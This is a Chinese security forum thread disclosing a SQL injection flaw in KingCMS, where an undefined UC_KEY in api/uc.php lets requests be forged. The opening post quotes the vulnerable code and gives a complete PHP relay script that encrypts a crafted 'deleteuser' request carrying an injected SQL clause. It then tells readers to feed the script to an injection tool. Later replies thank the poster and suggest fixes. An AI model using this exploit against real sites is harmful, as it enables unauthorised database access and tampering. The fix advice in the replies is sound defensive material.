查看: 16428|回复: 5

kingcms最新版sql注入漏洞

[复制链接]
发表于 2014-2-23 23:59:06 | 显示全部楼层 |阅读模式
简要描述:
kingcms 注入漏洞
详细说明:
api/uc.php

UC_KEY没有初始化导致注入

[AppleScript] 查看源码 复制代码
<?php
 
 
 
define('UC_CLIENT_VERSION', '1.5.0');	//note UCenter 版本标识
 
define('UC_CLIENT_RELEASE', '20090502');
 
 
 
define('API_DELETEUSER', 1);		//note 用户删除 API 接口开关
 
define('API_RENAMEUSER', 1);		//note 用户改名 API 接口开关
 
define('API_GETTAG', 1);		//note 获取标签 API 接口开关
 
define('API_SYNLOGIN', 1);		//note 同步登录 API 接口开关
 
define('API_SYNLOGOUT', 1);		//note 同步登出 API 接口开关
 
define('API_UPDATEPW', 1);		//note 更改用户密码 开关
 
define('API_UPDATEBADWORDS', 1);	//note 更新关键字列表 开关
 
define('API_UPDATEHOSTS', 1);		//note 更新域名解析缓存 开关
 
define('API_UPDATEAPPS', 1);		//note 更新应用列表 开关
 
define('API_UPDATECLIENT', 1);		//note 更新客户端缓存 开关
 
define('API_UPDATECREDIT', 0);		//note 更新用户积分 开关
 
define('API_GETCREDITSETTINGS', 0);	//note 向 UCenter 提供积分设置 开关
 
define('API_GETCREDIT', 0);		//note 获取用户的某项积分 开关
 
define('API_UPDATECREDITSETTINGS', 0);	//note 更新应用积分设置 开关
 
 
 
define('API_RETURN_SUCCEED', '1');
 
define('API_RETURN_FAILED', '-1');
 
define('API_RETURN_FORBIDDEN', '-2');
 
 
 
define('KC_INDEX',True);
 
define('KC_CALL_FUNC',True);
 
 
 
require_once '../global.php';//加载KingCMS
 
 
 
$king->load('user');//加载用户类
 
//note 普通的 http 通知方式
 
	error_reporting(0);
 
	restore_error_handler();
 
	set_magic_quotes_runtime(0);
 
	define('ROOT', substr(dirname(__FILE__), 0, -3));
 
	defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
 
	define('UC_CLIENT_ROOT', ROOT.'user/client/');
 
 
 
	$_DCACHE = $get = $post = array();
 
//解码传入参数
 
	$code = @$_GET['code'];
 
	//var_dump(UC_KEY);
 
	parse_str(_authcode($code, 'DECODE', UC_KEY), $get);//这里没有DEF UC_KEY 所以直接把UC_KEY作为一个字符串传入
 
	if(MAGIC_QUOTES_GPC) {
 
		$get = _stripslashes($get);
 
	}
 

这样我们就能执行UC API来进行注入了



写一个中转程序进行注入







代码如下
[AppleScript] 查看源码 复制代码
<?php
 
    $timestamp = time()+10*3600;
 
    $host="127.0.0.1";
 
    $uc_key="UC_KEY";
 
    $code=urlencode(_authcode("time=999999999999999999999999&ids=1) and 1={$_GET['id']} and 1 =(1&action=deleteuser", 'ENCODE', $uc_key));
 
	echo file_get_contents("http://127.0.0.1//kingcms/api/uc.php?code={$code}");
 function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
 
    $ckey_length = 4;
 
 
 
    $key = md5($key ? $key : UC_KEY);
 
    $keya = md5(substr($key, 0, 16));
 
    $keyb = md5(substr($key, 16, 16));
 
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
 
 
 
    $cryptkey = $keya.md5($keya.$keyc);
 
    $key_length = strlen($cryptkey);
 
 
 
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
 
    $string_length = strlen($string);
 
 
 
    $result = '';
 
    $box = range(0, 255);
 
 
 
    $rndkey = array();
 
    for($i = 0; $i <= 255; $i++) {
 
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
 
    }
 
 
 
    for($j = $i = 0; $i < 256; $i++) {
 
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
 
        $tmp = $box[$i];
 
        $box[$i] = $box[$j];
 
        $box[$j] = $tmp;
 
    }
 
 
 
    for($a = $j = $i = 0; $i < $string_length; $i++) {
 
        $a = ($a + 1) % 256;
 
        $j = ($j + $box[$a]) % 256;
 
        $tmp = $box[$a];
 
        $box[$a] = $box[$j];
 
        $box[$j] = $tmp;
 
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
 
    }
 
 
 
    if($operation == 'DECODE') {
 
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
 
            return substr($result, 26);
 
        } else {
 
                return '';
 
            }
 
    } else {
 
        return $keyc.str_replace('=', '', base64_encode($result));
 
    }}
 
?>
 

保存为1.php

利用方法

http://127.0.0.1/x.php?id=1

丢到大萝卜里面跑就OKl饿
<code>
</code>
20142201035453699.jpg
回复

使用道具 举报

发表于 2014-2-24 09:36:26 | 显示全部楼层
又是一枚注入
回复 支持 反对

使用道具 举报

发表于 2014-2-26 19:55:24 | 显示全部楼层
木有成功呢
回复 支持 反对

使用道具 举报

发表于 2026-5-21 11:30:00 | 显示全部楼层

Re: kingcms最新版sql注入漏洞

感谢 Diana 提交的这个漏洞信息,分析得非常详细!KingCMS 最新版确实需要引起重视。 这个漏洞的关键点在于 `api/uc.php` 中未对 `UC_KEY` 进行有效初始化,导致 `_authcode` 解码时使用了空的或默认的 key,攻击者可以构造特制的 `code` 参数绕过验证,进而通过 `parse_str` 注入恶意 SQL 语句。你给出的中转代码也清晰展示了攻击链路,很有参考价值。 建议官方尽快修复:在 `api/uc.php` 中严格定义并校验 `UC_KEY` 的值,同时对所有通过 `_authcode` 解码后获取的参数进行严格的过滤或参数化查询,避免直接拼接 SQL。也提醒使用 KingCMS 的用户在补丁出来前暂时关闭或限制 `api/uc.php` 的外部访问。 再次感谢分享,期待你的更多发现!
回复 支持 反对

使用道具 举报

发表于 3 天前 | 显示全部楼层

Re: kingcms最新版sql注入漏洞

感谢楼主分享,这个漏洞分析得很清楚。UC_KEY未初始化确实是个典型问题,直接导致可以任意构造请求参数,进而执行SQL注入。楼主还贴出了利用代码,方便复现,非常详细。希望官方能尽快在更新中加上UC_KEY的初始化和校验,避免被利用。
回复 支持 反对

使用道具 举报

发表于 3 天前 | 显示全部楼层

Re: kingcms最新版sql注入漏洞

感谢楼主分享这个漏洞细节。UC_KEY未初始化直接作为参数传入 _authcode 函数,确实会导致攻击者可以构造任意请求,进而利用 UC API 进行 SQL 注入。这种注入可能造成数据泄露、篡改甚至服务器沦陷,属于高危漏洞。建议官方尽快在 global.php 或 api/uc.php 中正确定义 UC_KEY(例如从配置文件中读取),并对传入参数进行严格的过滤和校验。同时提醒使用 KingCMS 的用户在补丁发布前,暂时限制对 api/uc.php 的访问或对 code 参数进行额外验证。再次感谢楼主的详细分析和 PoC。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-6-25 03:52 , Processed in 0.062695 second(s), 23 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部